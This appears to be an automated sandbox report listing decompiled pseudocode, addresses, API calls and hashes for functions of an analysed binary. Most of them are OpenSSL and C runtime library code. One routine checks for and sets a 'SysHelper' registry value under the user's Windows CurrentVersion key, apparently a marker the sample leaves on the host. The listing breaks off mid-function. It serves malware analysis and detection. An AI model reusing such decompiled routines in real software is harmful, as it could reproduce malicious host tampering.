String ID:  $Error encrypting message: %s$\\n
API String ID: 1783060780-3771355929
Opcode ID: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
Opcode Fuzzy Hash: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00463350(void* __ebx, void* __edx, void* __ebp, char _a4, intOrPtr* _a8) {
				void* __edi;
				intOrPtr _t12;
				void* _t13;
				char _t16;
				intOrPtr _t19;
				signed int _t22;
				char _t35;
				void* _t36;
				char* _t37;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t40;
				char* _t41;
				void* _t42;
				char* _t43;

				_t45 = __ebp;
				_t38 = __edx;
				_t34 = __ebx;
				_t40 = _a4;
				_t39 = _a8;
				 *_t39 = 0;
				if(_t40 == 0) {
					L26:
					return 1;
				} else {
					_t12 =  *_t40;
					if(_t12 == 0 || _t12 == 0xa) {
						goto L26;
					} else {
						_t13 = E00448190(_t40, "Proc-Type: ", 0xb);
						_t60 = _t13;
						if(_t13 == 0) {
							__eflags =  *((char*)(_t40 + 0xb)) - 0x34;
							if( *((char*)(_t40 + 0xb)) != 0x34) {
								goto L5;
							} else {
								__eflags =  *((char*)(_t40 + 0xc)) - 0x2c;
								if( *((char*)(_t40 + 0xc)) != 0x2c) {
									goto L5;
								} else {
									_t41 = _t40 + 0xd;
									__eflags = E00448190(_t41, "ENCRYPTED", 9);
									if(__eflags == 0) {
										_t16 =  *_t41;
										__eflags = _t16 - 0xa;
										if(_t16 == 0xa) {
											L13:
											__eflags =  *_t41;
											if(__eflags != 0) {
												_t42 = _t41 + 1;
												__eflags = E00448190(_t42, "DEK-Info: ", 0xa);
												if(__eflags == 0) {
													_t43 = _t42 + 0xa;
													__eflags = _t43;
													_t37 = _t43;
													_push(_t34);
													while(1) {
														_t35 =  *_t43;
														__eflags = _t35 - 0x41;
														if(_t35 < 0x41) {
															goto L20;
														}
														__eflags = _t35 - 0x5a;
														if(_t35 <= 0x5a) {
															L22:
															_t43 = _t43 + 1;
															continue;
														}
														L20:
														__eflags = _t35 - 0x2d;
														if(_t35 == 0x2d) {
															goto L22;
														}
														_t6 = _t35 - 0x30; // -48
														__eflags = _t6 - 9;
														if(_t6 <= 9) {
															goto L22;
														}
														 *_t43 = 0;
														_t19 = E0047ECD0(_t37);
														 *_t39 = _t19;
														 *_t43 = _t35;
														_a4 = _t43 + 1;
														_pop(_t36);
														__eflags = _t19;
														if(__eflags != 0) {
															_t22 = E00464360( &_a4, _t39 + 4,  *((intOrPtr*)(_t19 + 0xc)));
															asm("sbb eax, eax");
															return  ~( ~_t22);
														} else {
															E004512D0(_t36, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x72, ".\\crypto\\pem\\pem_lib.c", 0x219);
															__eflags = 0;
															return 0;
														}
														goto L27;
													}
												} else {
													E004512D0(_t34, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x69, ".\\crypto\\pem\\pem_lib.c", 0x200);
													__eflags = 0;
													return 0;
												}
											} else {
												goto L14;
											}
										} else {
											while(1) {
												__eflags = _t16;
												if(__eflags == 0) {
													break;
												}
												_t16 =  *((intOrPtr*)(_t41 + 1));
												_t41 = _t41 + 1;
												__eflags = _t16 - 0xa;
												if(_t16 != 0xa) {
													continue;
												} else {
													goto L13;
												}
												goto L27;
											}
											L14:
											E004512D0(_t34, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x70, ".\\crypto\\pem\\pem_lib.c", 0x1fd);
											__eflags = 0;
											return 0;
										}
									} else {
										E004512D0(__ebx, _t38, _t39, __ebp, __eflags, 9, 0x6b, 0x6a, ".\\crypto\\pem\\pem_lib.c", 0x1f9);
										__eflags = 0;
										return 0;
									}
								}
							}
						} else {
							E004512D0(__ebx, _t38, _t39, __ebp, _t60, 9, 0x6b, 0x6b, ".\\crypto\\pem\\pem_lib.c", 0x1f4);
							L5:
							return 0;
						}
					}
				}
				L27:
			}

0x00463350
0x00463350
0x00463350
0x00463351
0x00463356
0x0046335a
0x00463362
0x004634c7
0x004634cd
0x00463368
0x00463368
0x0046336c
0x00000000
0x0046337a
0x00463382
0x0046338a
0x0046338c
0x004633ab
0x004633af
0x00000000
0x004633b1
0x004633b1
0x004633b5
0x00000000
0x004633b7
0x004633b9
0x004633ca
0x004633cc
0x004633eb
0x004633ed
0x004633ef
0x004633fd
0x004633fd
0x00463400
0x00463421
0x00463430
0x00463432
0x00463451
0x00463451
0x00463454
0x00463456
0x00463457
0x00463457
0x00463459
0x0046345c
0x00000000
0x00000000
0x0046345e
0x00463461
0x0046346f
0x0046346f
0x00000000
0x0046346f
0x00463463
0x00463463
0x00463466
0x00000000
0x00000000
0x00463468
0x0046346b
0x0046346d
0x00000000
0x00000000
0x00463473
0x00463476
0x0046347e
0x00463480
0x00463483
0x00463487
0x00463488
0x0046348a
0x004634b5
0x004634bf
0x004634c5
0x0046348c
0x0046349c
0x004634a4
0x004634a8
0x004634a8
0x00000000
0x0046348a
0x00463434
0x00463444
0x0046344c
0x00463450
0x00463450
0x00000000
0x00000000
0x00000000
0x004633f1
0x004633f1
0x004633f1
0x004633f3
0x00000000
0x00000000
0x004633f5
0x004633f8
0x004633f9
0x004633fb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004633fb
0x00463402
0x00463412
0x0046341a
0x0046341e
0x0046341e
0x004633ce
0x004633de
0x004633e6
0x004633ea
0x004633ea
0x004633cc
0x004633b5
0x0046338e
0x0046339e
0x004633a7
0x004633aa
0x004633aa
0x0046338c
0x0046336c
0x00000000

APIs

_strncmp.LIBCMT ref: 00463382
_strncmp.LIBCMT ref: 004633C2

Strings

.\crypto\pem\pem_lib.c, xrefs: 00463393, 004633D3, 00463407, 00463439, 00463491
DEK-Info: , xrefs: 00463422
Proc-Type: , xrefs: 0046337C
ENCRYPTED, xrefs: 004633BC

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
API String ID: 909875538-2908105608
Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F

Uniqueness

Uniqueness Score: -1.00%

Function 004C5D39 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004C5D39(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v32;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				signed int _t32;
				signed int* _t34;
				signed int _t36;
				signed int _t42;
				signed int _t47;
				char* _t48;
				signed int _t49;
				signed int _t52;
				unsigned int _t58;
				signed int _t59;
				signed int _t60;
				void* _t63;
				signed int _t66;
				signed int _t73;
				void* _t78;
				char* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t83;
				void* _t89;
				void* _t93;

				_t63 = __edx;
				_t89 = _t93;
				_t78 = E0042501F(__ebx);
				if(_t78 != 0) {
					_push(__ebx);
					__eflags =  *(_t78 + 0x24);
					if( *(_t78 + 0x24) != 0) {
						L7:
						_t79 =  *(_t78 + 0x24);
						_t32 = E0042C0FD(_t79, 0x86, E004C5D13(_a4));
						__eflags = _t32;
						if(_t32 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E004242FD(0x86, _t63);
							asm("int3");
							_push(_t89);
							__eflags = _v32;
							_push(_t79);
							if(__eflags != 0) {
								_t80 = _v16;
								__eflags = _t80;
								if(__eflags == 0) {
									goto L10;
								} else {
									_t7 = _t80 - 1; // -1
									_t36 = E0043FF8E(_v20, _t80, E004C5D13(_v12), _t7);
									__eflags = _t36;
									if(_t36 == 0) {
										goto L11;
									} else {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E004242FD(0x86, _t63);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t58 = _v52;
										_push(0);
										__eflags = _t58;
										if(_t58 == 0) {
											L34:
											return _v60;
										} else {
											_push(_t80);
											_push(0x86);
											_t52 = _t58;
											_t83 = _v56;
											__eflags = _t83 & 0x00000003;
											_t73 = _v60;
											if((_t83 & 0x00000003) != 0) {
												while(1) {
													_t42 =  *_t83;
													_t83 = _t83 + 1;
													 *_t73 = _t42;
													_t73 = _t73 + 1;
													_t58 = _t58 - 1;
													__eflags = _t58;
													if(_t58 == 0) {
														goto L26;
													}
													__eflags = _t42;
													if(_t42 == 0) {
														__eflags = _t73 & 0x00000003;
														if((_t73 & 0x00000003) == 0) {
															L30:
															_t52 = _t58;
															_t59 = _t58 >> 2;
															__eflags = _t59;
															if(_t59 != 0) {
																goto L46;
															} else {
																goto L31;
															}
														} else {
															while(1) {
																 *_t73 = _t42;
																_t73 = _t73 + 1;
																_t58 = _t58 - 1;
																__eflags = _t58;
																if(_t58 == 0) {
																	goto L49;
																}
																__eflags = _t73 & 0x00000003;
																if((_t73 & 0x00000003) != 0) {
																	continue;
																} else {
																	goto L30;
																}
																goto L50;
															}
															goto L49;
														}
													} else {
														__eflags = _t83 & 0x00000003;
														if((_t83 & 0x00000003) != 0) {
															continue;
														} else {
															_t52 = _t58;
															_t60 = _t58 >> 2;
															__eflags = _t60;
															if(_t60 != 0) {
																goto L36;
															} else {
																goto L23;
															}
														}
													}
													goto L50;
												}
												goto L26;
											} else {
												_t60 = _t58 >> 2;
												__eflags = _t60;
												if(_t60 != 0) {
													do {
														L36:
														_t47 =  *_t83 ^ 0xffffffff ^ 0x7efefeff +  *_t83;
														_t66 =  *_t83;
														_t83 = _t83 + 4;
														__eflags = _t47 & 0x81010100;
														if((_t47 & 0x81010100) == 0) {
															goto L35;
														} else {
															__eflags = _t66;
															if(_t66 == 0) {
																__eflags = 0;
																 *_t73 = 0;
																goto L45;
															} else {
																__eflags = _t66;
																if(_t66 == 0) {
																	 *_t73 = _t66 & 0x000000ff;
																	goto L45;
																} else {
																	__eflags = _t66 & 0x00ff0000;
																	if((_t66 & 0x00ff0000) == 0) {
																		 *_t73 = _t66 & 0x0000ffff;
																		goto L45;
																	} else {
																		__eflags = _t66 & 0xff000000;
																		if((_t66 & 0xff000000) != 0) {
																			goto L35;
																		} else {
																			 *_t73 = _t66;
																			L45:
																			_t73 = _t73 + 4;
																			_t42 = 0;
																			_t59 = _t60 - 1;
																			__eflags = _t59;
																			if(_t59 != 0) {
																				L46:
																				_t42 = 0;
																				__eflags = 0;
																				do {
																					 *_t73 = 0;
																					_t73 = _t73 + 4;
																					_t59 = _t59 - 1;
																					__eflags = _t59;
																				} while (_t59 != 0);
																			}
																			_t52 = _t52 & 0x00000003;
																			__eflags = _t52;
																			if(_t52 != 0) {
																				goto L31;
																			} else {
																				L49:
																				return _v60;
																			}
																		}
																	}
																}
															}
														}
														goto L50;
														L35:
														 *_t73 = _t66;
														_t73 = _t73 + 4;
														_t60 = _t60 - 1;
														__eflags = _t60;
													} while (_t60 != 0);
													L23:
													_t52 = _t52 & 0x00000003;
													__eflags = _t52;
													if(_t52 == 0) {
														goto L26;
													} else {
														goto L24;
													}
												} else {
													while(1) {
														L24:
														_t42 =  *_t83;
														_t83 = _t83 + 1;
														 *_t73 = _t42;
														_t73 = _t73 + 1;
														__eflags = _t42;
														if(_t42 == 0) {
															break;
														}
														_t52 = _t52 - 1;
														__eflags = _t52;
														if(_t52 != 0) {
															continue;
														} else {
															L26:
															return _v60;
														}
														goto L50;
													}
													L32:
													_t52 = _t52 - 1;
													__eflags = _t52;
													if(_t52 != 0) {
														L31:
														 *_t73 = _t42;
														_t73 = _t73 + 1;
														__eflags = _t73;
														goto L32;
													}
													goto L34;
												}
											}
										}
									}
								}
							} else {
								L10:
								_t34 = E00425208(__eflags);
								_t81 = 0x16;
								 *_t34 = _t81;
								E004242D2();
								_t36 = _t81;
								L11:
								return _t36;
							}
						} else {
							_t48 = _t79;
							goto L5;
						}
					} else {
						_t49 = E00428C96(0x86, 1);
						 *(_t78 + 0x24) = _t49;
						__eflags = _t49;
						if(_t49 != 0) {
							goto L7;
						} else {
							_t48 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
							L5:
							goto L6;
						}
					}
				} else {
					_t48 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
					L6:
					return _t48;
				}
				L50:
			}

0x004c5d39
0x004c5d3a
0x004c5d42
0x004c5d46
0x004c5d4f
0x004c5d58
0x004c5d5b
0x004c5d78
0x004c5d7b
0x004c5d86
0x004c5d8e
0x004c5d90
0x004c5d96
0x004c5d97
0x004c5d98
0x004c5d99
0x004c5d9a
0x004c5d9b
0x004c5da0
0x004c5da1
0x004c5da4
0x004c5da8
0x004c5da9
0x004c5dbf
0x004c5dc2
0x004c5dc4
0x00000000
0x004c5dc6
0x004c5dc6
0x004c5dd8
0x004c5de0
0x004c5de2
0x00000000
0x004c5de4
0x004c5de6
0x004c5de7
0x004c5de8
0x004c5de9
0x004c5dea
0x004c5deb
0x004c5df0
0x004c5df1
0x004c5df2
0x004c5df3
0x004c5df4
0x004c5df5
0x004c5df6
0x004c5df7
0x004c5df8
0x004c5df9
0x004c5dfa
0x004c5dfb
0x004c5dfc
0x004c5dfd
0x004c5dfe
0x004c5dff
0x004c5e00
0x004c5e04
0x004c5e05
0x004c5e07
0x004c5e9f
0x004c5ea4
0x004c5e0d
0x004c5e0d
0x004c5e0e
0x004c5e0f
0x004c5e11
0x004c5e15
0x004c5e1b
0x004c5e1f
0x004c5e2c
0x004c5e2c
0x004c5e2e
0x004c5e31
0x004c5e33
0x004c5e36
0x004c5e36
0x004c5e39
0x00000000
0x00000000
0x004c5e3b
0x004c5e3d
0x004c5e6e
0x004c5e74
0x004c5e8c
0x004c5e8c
0x004c5e8e
0x004c5e8e
0x004c5e91
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e76
0x004c5e76
0x004c5e76
0x004c5e78
0x004c5e7b
0x004c5e7b
0x004c5e7e
0x00000000
0x00000000
0x004c5e84
0x004c5e8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e8a
0x00000000
0x004c5e76
0x004c5e3f
0x004c5e3f
0x004c5e45
0x00000000
0x004c5e47
0x004c5e47
0x004c5e49
0x004c5e49
0x004c5e4c
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e4c
0x004c5e45
0x00000000
0x004c5e3d
0x00000000
0x004c5e21
0x004c5e21
0x004c5e21
0x004c5e24
0x004c5eaf
0x004c5eaf
0x004c5ebb
0x004c5ebd
0x004c5ebf
0x004c5ec2
0x004c5ec7
0x00000000
0x004c5ec9
0x004c5ec9
0x004c5ecb
0x004c5ef9
0x004c5efb
0x00000000
0x004c5ecd
0x004c5ecd
0x004c5ecf
0x004c5ef5
0x00000000
0x004c5ed1
0x004c5ed1
0x004c5ed7
0x004c5eeb
0x00000000
0x004c5ed9
0x004c5ed9
0x004c5edf
0x00000000
0x004c5ee1
0x004c5ee1
0x004c5efd
0x004c5efd
0x004c5f00
0x004c5f02
0x004c5f02
0x004c5f05
0x004c5f07
0x004c5f07
0x004c5f07
0x004c5f09
0x004c5f09
0x004c5f0b
0x004c5f0e
0x004c5f0e
0x004c5f0e
0x004c5f09
0x004c5f13
0x004c5f13
0x004c5f16
0x00000000
0x004c5f1c
0x004c5f1c
0x004c5f23
0x004c5f23
0x004c5f16
0x004c5edf
0x004c5ed7
0x004c5ecf
0x004c5ecb
0x00000000
0x004c5ea5
0x004c5ea5
0x004c5ea7
0x004c5eaa
0x004c5eaa
0x004c5eaa
0x004c5e4e
0x004c5e4e
0x004c5e4e
0x004c5e51
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e2a
0x004c5e53
0x004c5e53
0x004c5e53
0x004c5e55
0x004c5e58
0x004c5e5a
0x004c5e5d
0x004c5e5f
0x00000000
0x00000000
0x004c5e61
0x004c5e61
0x004c5e64
0x00000000
0x004c5e66
0x004c5e66
0x004c5e6d
0x004c5e6d
0x00000000
0x004c5e64
0x004c5e98
0x004c5e98
0x004c5e98
0x004c5e9b
0x004c5e93
0x004c5e93
0x004c5e95
0x004c5e95
0x00000000
0x004c5e95
0x00000000
0x004c5e9e
0x004c5e24
0x004c5e1f
0x004c5e07
0x004c5de2
0x004c5dab
0x004c5dab
0x004c5dab
0x004c5db2
0x004c5db3
0x004c5db5
0x004c5dba
0x004c5dbc
0x004c5dbe
0x004c5dbe
0x004c5d92
0x004c5d92
0x00000000
0x004c5d92
0x004c5d5d
0x004c5d60
0x004c5d65
0x004c5d6a
0x004c5d6c
0x00000000
0x004c5d6e
0x004c5d6e
0x004c5d73
0x00000000
0x004c5d74
0x004c5d6c
0x004c5d48
0x004c5d48
0x004c5d75
0x004c5d77
0x004c5d77
0x00000000

APIs

__getptd_noexit.LIBCMT ref: 004C5D3D

Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083

__calloc_crt.LIBCMT ref: 004C5D60
__get_sys_err_msg.LIBCMT ref: 004C5D7E
__invoke_watson.LIBCMT ref: 004C5D9B
__get_sys_err_msg.LIBCMT ref: 004C5DCD
__invoke_watson.LIBCMT ref: 004C5DEB

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt__get_sys_err_msg__invoke_watson$CurrentThread__getptd_noexit__initptd
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 2139067377-798102604
Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C6A0() {
				void* _v8;
				char _v12;
				int _v16;
				int _v20;
				char _t16;

				_v8 = 0;
				_t16 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion", 0, 0xf003f,  &_v8);
				if(_t16 != 0) {
					L4:
					return 1;
				} else {
					_v12 = _t16;
					_v20 = 4;
					_v16 = 4;
					if(RegQueryValueExW(_v8, L"SysHelper", 0,  &_v20,  &_v12,  &_v16) != 0) {
						_v12 = 1;
						RegSetValueExW(_v8, L"SysHelper", 0, 4,  &_v12, 4);
						RegCloseKey(_v8);
						goto L4;
					} else {
						RegCloseKey(_v8);
						return 0;
					}
				}
			}

0x0040c6a9
0x0040c6c2
0x0040c6ca
0x0040c734
0x0040c739
0x0040c6cc
0x0040c6cc
0x0040c6d6
0x0040c6e1
0x0040c6fb
0x0040c711
0x0040c725
0x0040c72e
0x00000000
0x0040c6fd
0x0040c700
0x0040c70b
0x0040c70b
0x0040c6fb

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
RegCloseKey.ADVAPI32(00000000), ref: 0040C700
RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
RegCloseKey.ADVAPI32(00000000), ref: 0040C72E

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040C6B8
SysHelper, xrefs: 0040C6EB, 0040C71D

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: CloseValue$OpenQuery
String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
API String ID: 3962714758-1667468722
Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58

Uniqueness

Uniqueness Score: -1.00%

Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E004573F0(signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, char _a28, signed int _a60, intOrPtr _a68, char _a72, signed int _a76, signed int _a80, signed int _a84, signed int _a88, intOrPtr _a92, signed int _a96, intOrPtr _a100, signed char _a104) {
				signed int _v0;
				signed int _v4;
				intOrPtr _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t129;
				intOrPtr _t135;
				signed int _t136;
				signed int _t140;
				void* _t141;
				signed int _t143;
				signed int _t148;
				void* _t150;
				intOrPtr _t154;
				signed char _t160;
				char _t166;
				intOrPtr _t170;
				signed int _t174;
				signed int _t181;
				signed int* _t182;
				intOrPtr _t184;
				intOrPtr _t185;
				void* _t186;
				intOrPtr _t187;
				signed char _t189;
				signed int _t192;
				signed int* _t196;
				signed int _t199;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				void* _t208;
				intOrPtr _t209;
				signed int _t213;
				intOrPtr _t214;
				intOrPtr* _t217;
				signed int _t220;
				signed int _t221;
				void* _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t231;
				intOrPtr* _t232;
				signed int* _t233;
				void* _t235;
				signed int _t240;
				void* _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr _t249;
				intOrPtr _t250;
				signed int _t253;
				signed int _t257;
				void* _t262;
				signed char _t268;

				E0042F7C0(0x40);
				_t129 =  *0x50ad20; // 0x84f4da2
				_a60 = _t129 ^ _t253;
				_t187 = _a100;
				_t181 = _a84;
				_t249 = _a68;
				_a28 = _a72;
				_a8 = _a76;
				_v0 = _a80;
				_t220 = 0;
				_a4 = 0x4ffca4;
				_a12 = 0;
				_t188 =  <  ? 0 : _t187;
				_t213 = _a88;
				_a100 =  <  ? 0 : _t187;
				_t189 = _a104;
				if((_t189 & 0x00000040) == 0) {
					_t257 = _t213;
					if(_t257 > 0 || _t257 >= 0 && _t181 >= 0) {
						__eflags = _t189 & 0x00000002;
						if((_t189 & 0x00000002) == 0) {
							__eflags = _t189 & 0x00000004;
							_a16 = 0x20;
							_t179 =  !=  ? _a16 : 0;
							_a12 =  !=  ? _a16 : 0;
						} else {
							_a12 = 0x2b;
						}
					} else {
						_t181 =  ~_t181;
						_a12 = 0x2d;
						asm("adc edx, eax");
						_t213 =  ~_t213;
					}
				}
				_t135 = _a92;
				if((_t189 & 0x00000008) != 0) {
					if(_t135 != 8) {
						__eflags = _a92 - 0x10;
						_t178 =  !=  ? 0x4ffca4 : "0x";
						_a4 =  !=  ? 0x4ffca4 : "0x";
						_t135 = _a92;
					} else {
						_a4 = "0";
					}
				}
				_a16 = "0123456789abcdef";
				_t230 =  !=  ? 1 : _t220;
				_t262 =  !=  ? 1 : _t220;
				_t192 =  ==  ? _a16 : "0123456789ABCDEF";
				_t231 = _t192;
				while(1) {
					_t136 = E0043AE20(_t181, _t213, _t135, 0);
					_a4 = _t181;
					_t181 = _t136;
					 *((char*)(_t253 + _t220 + 0x30)) =  *((intOrPtr*)(_t192 + _t231));
					_t220 = _t220 + 1;
					_t192 = _t181 | _t213;
					if(_t192 == 0) {
						break;
					}
					_t135 = _a92;
					if(_t220 < 0x1a) {
						continue;
					}
					break;
				}
				_t232 = _a4;
				_a16 = _t220;
				if(_t220 != 0x1a) {
					if(__eflags >= 0) {
						E0042AC83();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						E0042F7C0(4);
						_t140 = _a8;
						_t214 = 0;
						__eflags = _t140;
						_v16 = 0;
						_t196 =  !=  ? _t140 : "<NULL>";
						_t141 = 0;
						_a8 = _t196;
						__eflags =  *_t196;
						if( *_t196 != 0) {
							do {
								_t141 = _t141 + 1;
								__eflags =  *(_t141 + _t196);
							} while ( *(_t141 + _t196) != 0);
						}
						_t199 =  <  ? _t214 : _a16 - _t141;
						__eflags = _a12 & 0x00000001;
						_a16 = _t199;
						if((_a12 & 0x00000001) != 0) {
							_t199 =  ~_t199;
							_a16 = _t199;
						}
						_push(_t181);
						_t182 = _v0;
						_push(_t249);
						_t250 = _v8;
						_push(_t232);
						_t233 = _a4;
						_push(_t220);
						_t221 = _v4;
						__eflags = _t199;
						if(_t199 > 0) {
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L71;
								}
								__eflags = _t221;
								if(_t221 != 0) {
									__eflags =  *_t182 -  *_t233;
									if( *_t182 >=  *_t233) {
										do {
											__eflags =  *_t221;
											if( *_t221 != 0) {
												 *_t233 =  *_t233 + 0x400;
												__eflags =  *_t233;
												_t150 = E00454F30( *_t221,  *_t233, ".\\crypto\\bio\\b_print.c", 0x2ed);
												_t253 = _t253 + 0x10;
												 *_t221 = _t150;
											} else {
												__eflags =  *_t233;
												if( *_t233 == 0) {
													 *_t233 = 0x400;
												}
												 *_t221 = E00454E50( *_t233, ".\\crypto\\bio\\b_print.c", 0x2e5);
												_t253 = _t253 + 0xc;
												_t206 =  *_t182;
												__eflags = _t206;
												if(_t206 != 0) {
													E0042D8D0(_t152, _v0, _t206);
													_t253 = _t253 + 0xc;
												}
												_v0 = 0;
											}
											__eflags =  *_t182 -  *_t233;
										} while ( *_t182 >=  *_t233);
										_t214 = _v16;
									}
								}
								_t203 =  *_t182;
								__eflags = _t203 -  *_t233;
								if(_t203 <  *_t233) {
									_t148 = _v0;
									__eflags = _t148;
									if(_t148 == 0) {
										 *((char*)(_t203 +  *_t221)) = 0x20;
									} else {
										 *((char*)(_t148 + _t203)) = 0x20;
									}
									 *_t182 =  *_t182 + 1;
									__eflags =  *_t182;
								}
								_t214 = _t214 + 1;
								_t205 = _a16 - 1;
								_v16 = _t214;
								_a16 = _t205;
								__eflags = _t205;
								if(_t205 > 0) {
									continue;
								}
								goto L71;
							}
						}
						L71:
						_t200 = _a8;
						_t143 =  *_t200;
						__eflags = _t143;
						if(_t143 != 0) {
							_a8 = _t200 - _t214;
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L75;
								}
								E00456F70(_t250, _t221, _t182, _t233, _t143);
								_t253 = _t253 + 0x14;
								_t214 = _v16 + 1;
								_v16 = _t214;
								_t143 =  *((intOrPtr*)(_a8 + _t214));
								__eflags = _t143;
								if(_t143 != 0) {
									continue;
								}
								goto L75;
							}
						}
						L75:
						__eflags = _a16;
						if(_a16 < 0) {
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L78;
								}
								_t143 = E00456F70(_t250, _t221, _t182, _t233, 0x20);
								_t253 = _t253 + 0x14;
